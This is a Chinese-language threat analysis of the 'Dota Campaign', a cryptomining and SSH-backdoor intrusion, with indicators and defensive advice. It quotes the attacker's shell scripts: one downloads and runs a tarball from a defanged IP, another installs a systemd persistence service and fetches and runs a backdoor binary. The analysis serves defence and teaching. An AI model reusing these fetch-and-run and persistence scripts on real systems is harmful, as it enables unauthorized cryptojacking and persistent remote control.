Dota Campaign木马分析：挖矿与后门复合型攻击技术解析

1. 攻击概述

Dota Campaign是一种复合型恶意攻击活动，结合了加密货币挖矿和SSH后门功能。攻击者通过弱SSH凭证获取初始访问权限，随后部署多个恶意组件实现持久化控制和资源滥用。

2. 初始感染阶段

2.1 攻击入口

• 攻击方式：通过SSH弱口令爆破（用户名和密码均为"salvatore"）
• 认证成功后：立即通过SSH通道执行系统命令

2.2 初始载荷

攻击者执行以下操作序列：

1. 从54.37.70[.]249下载.x15cache文件
2. 等待10秒后执行该文件
3. 修改用户密码为随机字符串

.x15cache文件内容分析：

#!/bin/sh
wget 54.37.70[.]249/dota2.tar.gz
tar -xzvf dota2.tar.gz
cd .rsync
./cron || ./anacron

2.3 第二阶段载荷

攻击者下载并解压dota2.tar.gz文件，包含以下组件：

• .rsync目录
  • cron：64位挖矿程序
  • anacron：32位挖矿程序（备用）
  • 其他未使用的文件

3. 挖矿组件分析

3.1 挖矿程序特征

• 使用strings命令提取的关键字符串：
  • "cryptonight"：工作量证明算法
  • xmrig相关命令：门罗币CPU挖矿软件
• 编译时间：2019年5月3日

3.2 网络通信

• 连接至C2服务器：5.255.86[.]129:80
• 通信协议：基于JSON的通信，包含XMrig参数和cn参数(CryptoNight)

4. 第二阶段攻击

4.1 额外组件下载

攻击者在/dev/shm目录下载并执行：

• rp文件
• .satan脚本

4.2 .satan脚本分析

#!/bin/sh
# 创建系统服务实现持久化
cat > /etc/systemd/system/srsync.service <<EOF
[Unit]
Description=srsync

[Service]
ExecStart=/usr/local/bin/srsync.sh
Restart=always

[Install]
WantedBy=multi-user.target
EOF

# 下载并执行额外组件
wget 54.37.70[.]249/ps.bin -O /usr/local/bin/ps.bin
chmod +x /usr/local/bin/ps.bin
/usr/local/bin/ps.bin

5. 后门组件分析

5.1 ps.bin文件

• 32位可执行文件
• 主要功能：
  • 向~/authorized_keys添加攻击者的RSA公钥
  • 建立SSH后门
  • 包含大量SSH相关函数

5.2 IRC后门功能

• 连接IRC服务器
• 加入##root频道
• 接收并执行服务器下发的命令
• 包含DoS攻击功能代码

6. 入侵威胁指标(IoC)

7. 防御建议

1. SSH安全加固：

   • 禁用root远程登录
   • 使用密钥认证替代密码认证
   • 设置强密码策略
   • 启用fail2ban等防爆破工具

2. 系统监控：

   • 监控异常CPU使用率（挖矿特征）
   • 检查/dev/shm等临时目录的可疑文件
   • 监控异常网络连接（特别是到54.37.70[.]249和5.255.86[.]129）

3. 文件完整性检查：

   • 定期检查/etc/systemd/system/下的异常服务
   • 检查/usr/local/bin/等目录的可疑文件
   • 监控authorized_keys文件的修改

4. 入侵响应：

   • 发现感染后立即断开网络
   • 检查并删除所有相关IoC文件
   • 重置所有用户密码
   • 检查所有系统账户的authorized_keys文件

8. 攻击技术总结

Dota Campaign展示了现代恶意攻击的典型特征：

1. 初始访问：利用弱凭证爆破
2. 执行：通过SSH直接执行命令
3. 持久化：创建系统服务、SSH后门
4. 特权提升：尝试获取root权限
5. 防御规避：使用临时目录、多阶段下载
6. 命令与控制：基于IRC的C2通道
7. 目标影响：加密货币挖矿（资源滥用）

这种复合型攻击同时实现了经济利益（挖矿）和长期控制（后门），是当前网络安全面临的主要威胁类型之一。